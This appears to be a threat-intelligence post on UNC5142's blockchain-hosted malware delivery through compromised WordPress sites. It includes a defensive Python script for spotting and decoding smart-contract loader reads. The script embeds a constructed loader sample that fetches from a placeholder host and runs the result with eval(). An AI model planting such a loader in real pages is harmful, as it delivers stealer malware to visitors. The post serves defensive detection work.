UNC5142 is a sophisticated threat actor that leverages blockchain smart contracts and compromised WordPress websites to distribute information-stealing malware such as Atomic, Lumma, Rhadamanthys, and Vidar on both Windows and macOS. Their evolving multi-layered infrastructure, and their use of a public blockchain as a hosting layer for loader configuration, make the operation harder to take down and harder to detect. #UNC5142 #EtherHiding
Key points
- UNC5142 uses compromised websites and blockchain smart contracts to deliver malware.
- The threat actor employs a multi-stage JavaScript downloader called CLEARSHORT for malware distribution.
- They use the proxy pattern in their smart contracts, so the payload-serving logic can be updated without changing the contract address embedded in compromised sites; this supports rapid updates and resists takedown.
- Malware payloads are delivered via ClickFix-style social-engineering lures that trick the victim into running the payload themselves.
- The campaign has shown significant evolution, utilizing multi-contract systems on the blockchain for operational agility.
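The key points above describe loader JavaScript on a compromised site that reads its next stage from a smart contract. One practical way to triage a suspect page for this pattern is to look for read-only JSON-RPC `eth_call` requests in its inline scripts, record the contract address and function selector (the address stays stable under the proxy pattern, so it is a more durable indicator than any payload hash), and decode the ABI-encoded string the contract returns. The example below is added here and is not code from the original post or from the cited report; the sample HTML, the RPC endpoint, the contract address, the selector and the returned URL are all constructed placeholders, and the ABI layout decoded is the standard Solidity encoding of a single `string` return value (offset word, length word, padded data).

```python
import re

# Constructed placeholders: not real indicators from the campaign.
PLACEHOLDER_ADDR = "0x" + "0" * 36 + "1234"
PLACEHOLDER_SELECTOR = "0x20965255"          # hypothetical 4-byte function selector
NEXT_STAGE_URL = "https://cdn-stage.example/loader.js"  # hypothetical decoded result

# Constructed sample of an injected loader: a read-only eth_call against a fixed
# contract, with the decoded result handed straight to eval().
SAMPLE_HTML = f"""<html><body><script>
const rpc = "https://rpc-node.example/";
const body = {{"jsonrpc":"2.0","id":1,"method":"eth_call",
  "params":[{{"to":"{PLACEHOLDER_ADDR}","data":"{PLACEHOLDER_SELECTOR}"}},"latest"]}};
fetch(rpc,{{method:"POST",body:JSON.stringify(body)}})
  .then(r=>r.json()).then(j=>eval(decode(j.result)));
</script></body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
ETH_CALL_RE = re.compile(r'"method"\s*:\s*"eth_call"')
ADDR_RE = re.compile(r'"to"\s*:\s*"(0x[0-9a-fA-F]{40})"')
SELECTOR_RE = re.compile(r'"data"\s*:\s*"(0x[0-9a-fA-F]{8})')
DYNAMIC_EXEC_RE = re.compile(r"\b(eval|Function)\s*\(")


def find_contract_reads(html):
    """Return one finding per eth_call seen in inline scripts: the target contract,
    the function selector, and whether the script also uses eval()/Function()."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        script = m.group(1)
        if not ETH_CALL_RE.search(script):
            continue
        selectors = SELECTOR_RE.findall(script)
        for addr in ADDR_RE.findall(script):
            findings.append({
                "contract": addr.lower(),
                "selector": selectors[0].lower() if selectors else None,
                "dynamic_exec": bool(DYNAMIC_EXEC_RE.search(script)),
            })
    return findings


def encode_abi_string(s):
    """ABI-encode a single `string` return value (used here only to build test data)."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + padded).hex()


def decode_abi_string(result_hex):
    """Decode the `result` of an eth_call whose function returns a single string:
    word 0 is the offset to the string, the word at that offset is its length,
    and the UTF-8 bytes follow, zero-padded to a 32-byte boundary."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds the payload")
    return raw[start:start + length].decode("utf-8", errors="replace")


# Constructed RPC response standing in for what the contract would return.
SAMPLE_RPC_RESULT = encode_abi_string(NEXT_STAGE_URL)


def triage(html, rpc_result):
    """Combine both checks: where the page reads from, and what that read resolves to."""
    return {"reads": find_contract_reads(html), "next_stage": decode_abi_string(rpc_result)}


if __name__ == "__main__":
    print(triage(SAMPLE_HTML, SAMPLE_RPC_RESULT))
```

In practice the contract address and selector from `find_contract_reads` are what you add to blocklists and hunt queries; because the proxy pattern lets the operator swap the logic behind the same address, the decoded URL is expected to change while the address persists, so the address is the indicator to pivot on.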
Read More: https://thehackernews.com/2025/10/hackers-abuse-blockchain-smart.html